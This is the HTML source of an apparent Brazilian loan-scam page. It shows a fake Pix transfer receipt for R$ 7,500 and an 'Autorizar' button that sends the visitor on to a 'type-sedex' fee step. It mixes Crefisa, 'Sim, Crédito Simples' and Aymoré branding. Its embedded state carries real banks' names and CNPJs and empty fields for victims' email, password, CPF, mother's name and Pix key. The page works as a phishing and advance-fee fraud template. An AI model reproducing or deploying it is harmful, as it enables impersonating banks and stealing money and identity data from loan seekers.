<html data-capo="" style="--primary: #FE0064;">
    
    <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
    
    <head>
<meta charset="UTF-8">


<script type="text/javascript" async="" src="js/events_1.js"></script><script type="text/javascript" async="" src="js/events.js"></script><script type="text/javascript" async="" src="js/events_2.js"></script><script async="" src="https://pesquisa.plus/gerente/js/fbevents.js"></script>

  <!-- Meta Pixel Code -->
 
  <!-- End Meta Pixel Code -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Empréstimo facilitado, simulação gratuita!</title>
    <style>
        /*! modern-normalize v2.0.0 | MIT License | https://github.com/sindresorhus/modern-normalize */
        *,
        :after,
        :before {
            box-sizing: border-box
        }

        html {
            font-family: system-ui, Segoe UI, Roboto, Helvetica, Arial, sans-serif, Apple Color Emoji, Segoe UI Emoji;
            line-height: 1.15;
            -webkit-text-size-adjust: 100%;
            -moz-tab-size: 4;
            -o-tab-size: 4;
            tab-size: 4
        }

        body {
            margin: 0
        }

        hr {
            color: inherit;
            height: 0
        }

        abbr[title] {
            -webkit-text-decoration: underline dotted;
            text-decoration: underline dotted
        }

        b,
        strong {
            font-weight: bolder
        }

        code,
        kbd,
        pre,
        samp {
            font-family: ui-monospace, SFMono-Regular, Consolas, Liberation Mono, Menlo, monospace;
            font-size: 1em
        }

        small {
            font-size: 80%
        }

        sub,
        sup {
            font-size: 75%;
            line-height: 0;
            position: relative;
            vertical-align: baseline
        }

        sub {
            bottom: -.25em
        }

        sup {
            top: -.5em
        }

        table {
            border-color: inherit;
            text-indent: 0
        }

        button,
        input,
        optgroup,
        select,
        textarea {
            font-family: inherit;
            font-size: 100%;
            line-height: 1.15;
            margin: 0
        }

        button,
        select {
            text-transform: none
        }

        [type=button],
        [type=reset],
        [type=submit],
        button {
            -webkit-appearance: button
        }

        ::-moz-focus-inner {
            border-style: none;
            padding: 0
        }

        :-moz-focusring {
            outline: 1px dotted ButtonText
        }

        :-moz-ui-invalid {
            box-shadow: none
        }

        legend {
            padding: 0
        }

        progress {
            vertical-align: baseline
        }

        ::-webkit-inner-spin-button,
        ::-webkit-outer-spin-button {
            height: auto
        }

        [type=search] {
            -webkit-appearance: textfield;
            outline-offset: -2px
        }

        ::-webkit-search-decoration {
            -webkit-appearance: none
        }

        ::-webkit-file-upload-button {
            -webkit-appearance: button;
            font: inherit
        }

        summary {
            display: list-item
        }
    </style>
    <style>
        blockquote,
        dd,
        dl,
        figure,
        h1,
        h2,
        h3,
        h4,
        h5,
        h6,
        hr,
        ol,
        p,
        pre,
        ul {
            margin: 0
        }

        ol,
        ul {
            list-style: none;
            padding: 0
        }

        img,
        video {
            height: auto;
            max-width: 100%
        }

        *,
        :after,
        :before {
            border: 0 solid #000
        }

        :root {
            --primary: transparent;
            --red: #ef4444;
            --green: #27ae60
        }

        body {
            background-color: #fff;
            color: #000;
            font-size: 16px
        }

        #__nuxt,
        body,
        html {
            height: 100%
        }

        a {
            color: #1b98e0;
            text-decoration: none
        }

        a:hover {
            cursor: pointer;
            text-decoration: underline
        }

        .text-red {
            color: var(--red)
        }

        .text-green {
            color: var(--green)
        }

        .text-primary {
            color: var(--primary)
        }

        h2 {
            font-weight: 500
        }
    </style>
    <style>
        .default-layout[data-v-77968890] {
            display: grid;
            grid-template-areas: "top-bar" "content" "footer";
            grid-template-rows: auto 1fr auto;
            min-height: 100vh
        }

        .default-layout .top-bar[data-v-77968890] {
            grid-area: top-bar
        }

        .default-layout .content[data-v-77968890] {
            background-color: #f5f7f9;
            grid-area: content
        }

        .default-layout .footer[data-v-77968890] {
            grid-area: footer
        }
    </style>
    <style>
        .top-bar[data-v-f5d5d4cd] {
            background-color: var(--primary);
            border-bottom: 1px solid hsla(0, 0%, 100%, .3);
            width: 100%
        }

        .top-bar .container[data-v-f5d5d4cd] {
            display: grid;
            padding: 1.5rem 0;
            place-content: center
        }
    </style>
    <style>
        .container[data-v-0041013f] {
            box-sizing: border-box;
            margin: 0 auto;
            padding-left: 1rem;
            padding-right: 1rem
        }

        @media (min-width:640px) {
            .container[data-v-0041013f] {
                max-width: 90%
            }
        }

        @media (min-width:768px) {
            .container[data-v-0041013f] {
                max-width: 85%
            }
        }

        @media (min-width:1024px) {
            .container[data-v-0041013f] {
                max-width: 80%
            }
        }

        @media (min-width:1280px) {
            .container[data-v-0041013f] {
                max-width: 1000px
            }
        }
    </style>
    <style>
        img.logo[data-v-4f7075cc] {
            height: var(--2348ed9e);
            width: auto
        }

        h1.logo[data-v-4f7075cc] {
            color: #fff;
            text-shadow: 0 1px 2px rgba(0, 0, 0, .2)
        }
    </style>
    <style>
        .central-wrapper[data-v-4dac45b6] {
            margin: 2.5rem 0
        }

        .container[data-v-4dac45b6] {
            display: grid;
            gap: 1rem;
            max-width: 480px;
            place-items: center
        }
    </style>
    <style>
        .receipt[data-v-f6f028aa] {
            background: #fff;
            border: 1px solid #e8e8e8;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 0, 0, .1);
            max-width: 350px;
            padding: 20px;
            position: relative;
            width: 100%
        }

        .receipt[data-v-f6f028aa]:after,
        .receipt[data-v-f6f028aa]:before {
            background: repeating-linear-gradient(90deg, transparent, transparent 4px, rgba(0, 0, 0, .05) 0, rgba(0, 0, 0, .05) 5px);
            content: "";
            height: 100%;
            left: 0;
            position: absolute;
            top: 0;
            width: 100%;
            z-index: -1
        }

        .receipt h1[data-v-f6f028aa] {
            border-bottom: 2px dashed #ccc;
            font-size: 1.2em;
            padding-bottom: 10px;
            text-align: center
        }

        .info[data-v-f6f028aa],
        .receipt h1[data-v-f6f028aa] {
            margin-bottom: 20px
        }

        .info[data-v-f6f028aa] {
            text-align: left
        }

        .info p[data-v-f6f028aa] {
            font-size: .9em;
            margin: 5px 0
        }

        .info p strong[data-v-f6f028aa] {
            display: block;
            font-size: 1.1em;
            margin-top: 5px
        }

        .info .section[data-v-f6f028aa] {
            margin-bottom: 20px
        }

        .cta-button[data-v-f6f028aa] {
            background-color: #27ae60;
            border-radius: 5px;
            color: #fff;
            cursor: pointer;
            display: block;
            font-size: 1em;
            padding: 10px;
            text-align: center;
            text-decoration: none;
            text-transform: uppercase;
            transition: background-color .3s;
            width: 100%
        }

        .cta-button[data-v-f6f028aa]:hover {
            background-color: #1e8449
        }

        .footer[data-v-f6f028aa] {
            border-top: 2px dashed #ccc;
            color: #555;
            font-size: .8em;
            padding-top: 10px;
            text-align: center
        }

        .logo[data-v-f6f028aa] {
            height: var(--74617bb0)
        }
    </style>
    <style>
        .button[data-v-d342e251] {
            border-radius: 1rem;
            cursor: pointer;
            font-weight: 500;
            letter-spacing: .3px;
            padding: .75rem 3rem;
            transition: opacity .1s;
            width: -moz-max-content;
            width: max-content
        }

        .button.light[data-v-d342e251] {
            background: #fff;
            color: var(--primary)
        }

        .button.primary[data-v-d342e251] {
            background: var(--primary);
            color: #fff
        }

        .button[data-v-d342e251]:hover {
            opacity: .9
        }

        .button[data-v-d342e251]:disabled {
            cursor: not-allowed;
            opacity: .5
        }
    </style>
    <style>
        .footer[data-v-63f14862] {
            border-bottom: 7px solid var(--primary);
            border-top: 2px solid #edf0ef;
            color: #fff;
            color: #000;
            padding: 2rem 0;
            text-align: center
        }

        .footer p[data-v-63f14862] {
            margin: .5rem 0
        }
    </style>
    <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/TopBar.2vF9lWx7.css">
    <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/Container.B5PP9_Vn.css">
    <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/16-transfer.C_mMYl2K.css">
    <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/Button.CTY08tZL.css">
    <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/CentralWrapper.Jxhi_ayc.css">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/Ds3y3Bf3.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/k9y74een.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/Bo8ipC1T.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/2aeojNjQ.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/aBdgRk8r.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/MaghENf1.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/BJRZzHYv.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/CV182wBC.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/Bl1c_aD8.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/BxXuEPsU.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/DGc1ZeLM.js">
    <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/J9e3dA3M.js">
    <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/D-UNq_Tu.js">
    <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/BGBp0rdz.js">
    <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/Wpn3EkJ-.js">
    <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/CKC6fHHG.js">
    <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/BhOEMyyX.js">
    <script type="text/javascript" async="" src="js/events_3.js"></script>
    <script type="text/javascript" async="" src="js/events_1_1.js"></script>
    <script type="text/javascript" async="" src="js/events_2_1.js"></script>
    <script async="" src="js/fbevents_1.js"></script>
    <script type="module" src="https://pesquisa.plus/_nuxt/Ds3y3Bf3.js" crossorigin=""></script>
    <script id="unhead:payload" type="application/json">{"title":"Empréstimo facilitado, simulação gratuita!"}</script>
    <script src="js/latest_1.js" async="" defer=""></script>
    <script async="" defer="" src="js/pixel_1.js"></script>
    <link rel="stylesheet" href="https://unipay-br.org/_nuxt/default.fxhPcPvK.css"> 
    
    
    
</head>

<body>
    <div id="__nuxt">
        <div class="default-layout" data-v-77968890="">
            <style>
                .top-bar {
                    background-color: white;
                    border-bottom: 1px solid hsla(0, 0%, 100%, .3);
                    width: 100%;
                }

                .top-bar .container {
                    display: grid;
                    padding: 1.5rem 0;
                    place-content: center;
                }
            </style>
            <header class="top-bar">
                <div class="container">
                    <h1 class="logo" data-v-f5d5d4cd="" style="--2348ed9e: 10px; color: white;" data-v-4f7075cc=""><img src="images/Crefisa.png" style="max-width:100px"></h1>
                </div>
            </header>
            <main class="content" data-v-77968890=""><!--[-->
                <div class="central-wrapper transfer-page" data-v-4dac45b6="">
                    <div class="container" data-v-4dac45b6="" data-v-0041013f=""><!--[--><!--[-->
                        <div class="receipt" style="--74617bb0: 20px;" data-v-f6f028aa="">
                            <h1 data-v-f6f028aa="">Confirmação de Transferência</h1>
                            <div class="info" data-v-f6f028aa=""><!---->
                                <div class="section" data-v-f6f028aa="">
                                    <p data-v-f6f028aa="">Transferindo</p>
                                    <p data-v-f6f028aa="R$ 7.500,00"><strong data-v-f6f028aa="" id="loan">R$ 7.500,00</strong>
                                    </p>
                                </div>
                                <div class="section" data-v-f6f028aa="">
                                    <p data-v-f6f028aa=""></p>
                                    <p data-v-f6f028aa=""><strong data-v-f6f028aa=""></strong></p>
                                </div>
                                <div class="section" data-v-f6f028aa="">
                                    <p data-v-f6f028aa="">Tipo</p>
                                    <p data-v-f6f028aa=""><strong data-v-f6f028aa="">Pix</strong></p>
                                </div>
                                <div class="section" data-v-f6f028aa="">
                                    <p data-v-f6f028aa=""></p>
                                    <p data-v-f6f028aa=""><strong data-v-f6f028aa=""></strong></p>
                                </div>
                                <div class="section" data-v-f6f028aa="">
                                    <p data-v-f6f028aa="">Protocolo de transação</p>
                                    <p data-v-f6f028aa=""><strong data-v-f6f028aa="">7CAFDEDF1FAEECA</strong></p>
                                </div>
                            </div>
                            <div class="footer" data-v-f6f028aa="">
                                <p data-v-f6f028aa=""> No seu extrato bancário este pagamento aparecerá como <strong data-v-f6f028aa="">AYMORÉ CRÉDITO E INVESTIMENTO S.A</strong></p>
                            </div>
                        </div>
                        <style>
                            .button {
                                padding: 10px 20px;
                                font-size: 16px;
                                border: none;
                                border-radius: 5px;
                                cursor: pointer;
                                color: #fff;
                                background-color: #FE0064;
                            }

                            .button.primary {
                                background-color: #FE0064;
                            }
                        </style>
                        <button class="button primary" type="button" id="redirectButton">
                            Autorizar
                        </button>

                        <script>
    document.getElementById('redirectButton').addEventListener('click', function () {
        // Captura os parâmetros UTM da URL atual
        const urlParams = new URLSearchParams(window.location.search);
        const utmParams = urlParams.toString();
        
        // Constrói a nova URL com os parâmetros UTM, se existirem
        let redirectUrl = '../type-sedex/';
        if (utmParams) {
            redirectUrl += '?' + utmParams;
        }

        window.location.href = redirectUrl;
    });
    
        function getCookie(nome) {
            const nomeEQ = `${nome}=`;
            const cookies = document.cookie.split(';');
            for (let i = 0; i < cookies.length; i++) {
                let cookie = cookies[i].trim();
                if (cookie.indexOf(nomeEQ) === 0) {
                    return cookie.substring(nomeEQ.length, cookie.length);
                }
            }
            return null;
        }
        
        const limite = getCookie('limite');
        const limite2 = getCookie('limite');
        const valorFormatado = Number(limite).toLocaleString('pt-BR', {
            style: 'currency',
            currency: 'BRL',
        });
        loan.innerHTML = valorFormatado;
</script>
<!--]--><!--]-->
                    </div>
                </div><!--]-->
            </main>
            <footer class="footer" data-v-77968890="" data-v-63f14862="">
                <div class="container" data-v-63f14862="" data-v-0041013f=""><!--[-->
                    <p data-v-63f14862="">© 2024 Sim, Crédito Simples.</p>
                    <p data-v-63f14862="">Amador Bueno, nº474. Bloco C. 1º andar - Santo Amaro, São Paulo - SP, CEP 04752-901.</p><!--]-->
                </div>
            </footer>
        </div>
    </div>
    <div id="teleports"></div>
    <script type="application/json" id="__NUXT_DATA__" data-ssr="true">[["ShallowReactive",1],{"data":2,"state":4,"once":6,"_errors":7,"serverRendered":9,"path":10,"pinia":11},["ShallowReactive",3],{},["Reactive",5],{},["Set"],["ShallowReactive",8],{},true,"/uni/16-transfer",["Reactive",12],{"brand":13,"user":70,"card-user":79},{"brandSlug":14,"brands":15},"uni",[16,25,34,43,52,61],{"slug":17,"name":18,"logo":19,"cnpj":22,"address":23,"color":24},"bb","Banco do Brasil",{"normal":20,"light":21},"/brands/bb.svg","/brands/light/bb.svg","00.000.000/0001-91","Asa Norte, S/Nº, Brasília/DF - CEP 70040-911","#e1ae2f",{"slug":26,"name":27,"logo":28,"cnpj":31,"address":32,"color":33},"bc","Bradesco",{"normal":29,"light":30},"/brands/bradesco.svg","/brands/light/bradesco.svg","60.746.948.0001-12","Cidade De Deus, S/Nº, Osasco/SP - CEP 06029-900","#E1173F",{"slug":35,"name":36,"logo":37,"cnpj":40,"address":41,"color":42},"it","Itaú",{"normal":38,"light":39},"/brands/itau.svg","/brands/light/itau.svg","60.872.504/0001-23","Praça Alfredo Egydio de Souza Aranha, 100,  Parque Jabaquara/SP - CEP 04344-902","#FF6200",{"slug":44,"name":45,"logo":46,"cnpj":49,"address":50,"color":51},"std","Santander",{"normal":47,"light":48},"/brands/santander.svg","/brands/light/santander.svg","90.400.888/0001-42","Av. Presidente Juscelino Kubitscheck, 2041/2235, São Paulo/SP - CEP 13571-410","#cc0000",{"slug":53,"name":54,"logo":55,"cnpj":58,"address":59,"color":60},"cef","Caixa",{"normal":56,"light":57},"/brands/caixa.svg","/brands/light/caixa.svg","00.360.305/0001-04","Asa Sul, S/Nº, Brasília/DF - CEP 70070-140","#0066b3",{"slug":62,"name":63,"logo":64,"cnpj":67,"address":68,"color":69},"pag","PagBank",{"normal":65,"light":66},"/brands/pagbank.svg","/brands/light/pagbank.svg","08.561.701/0001-01","Av. Brigadeiro Faria Lima, 1.384, São Paulo/SP - CEP 01451-001","#1bb99a",{"publicId":71,"credential":72,"address":74,"personalInfo":75,"loan":76},"",{"email":71,"password":71,"hasFacebook":73},false,{"street":71,"number":-1,"complement":-1,"neighborhood":71,"city":71,"state":71,"zipCode":71},{"fullName":71,"cpf":71,"birthDate":71,"phone":71,"motherName":71,"gender":71,"firstName":71,"lastName":71},{"desiredValue":77,"installmentCount":77,"income":77,"occupation":71,"loanReason":71,"educationLevel":71,"salaryDay":77,"pixKey":71,"pixBank":71,"primaryPayment":77,"secondaryPayment":77,"currencyFormat":78},0,{"desiredValue":71,"income":71,"primaryPayment":71,"secondaryPayment":71},{"fullName":71,"birthDate":71,"cpf":71,"motherName":71,"street":71,"number":71,"complement":71,"neighborhood":71,"city":71,"state":71,"zipCode":71,"shipping":71}]</script>
    <script>window.__NUXT__ = {}; window.__NUXT__.config = { public: { apiBase: "https://api.hide-domain.com", adminId: 1, projectId: 1 }, app: { baseURL: "/", buildId: "f7f5e04f-036f-410e-b85c-b41773d9e483", buildAssetsDir: "/_nuxt/", cdnURL: "" } }</script>

<script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>

<script type="text/javascript">
    (function(c,l,a,r,i,t,y){
        c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
        t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
        y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
    })(window, document, "clarity", "script", "ppobfzii52");
</script>

</body></html>